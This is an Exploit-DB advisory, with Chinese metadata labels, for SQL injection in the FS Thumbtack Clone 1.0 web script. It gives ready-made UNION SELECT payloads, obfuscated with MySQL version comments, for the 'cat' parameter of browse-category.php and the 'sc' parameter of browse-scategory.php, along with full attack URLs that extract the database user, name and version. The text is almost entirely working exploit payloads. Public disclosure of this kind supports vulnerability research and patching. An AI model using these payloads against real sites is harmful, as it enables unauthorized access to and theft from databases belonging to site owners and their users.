FS Thumbtack Clone 1.0 – ‘cat’ / ‘sc’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-12-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43240/
  • # # # # # 
    # Exploit Title: FS Thumbtack Clone 1.0 - SQL Injection
    # Dork: N/A
    # Date: 08.12.2017
    # Vendor Homepage: https://fortunescripts.com/
    # Software Link: https://fortunescripts.com/product/thumbtack-clone/
    # Demo: http://thumbtack-clone.demonstration.co.in/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    # 
    # Proof of Concept: 
    # 
    # 1)
    # http://localhost/[PATH]/browse-category.php?cat=[SQL]
    # 
    # -91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-
    # 
    # http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-
    # 
    # 
    # 2)
    # http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
    # 
    # -34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
    # 
    # http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
    # 
    # # # # #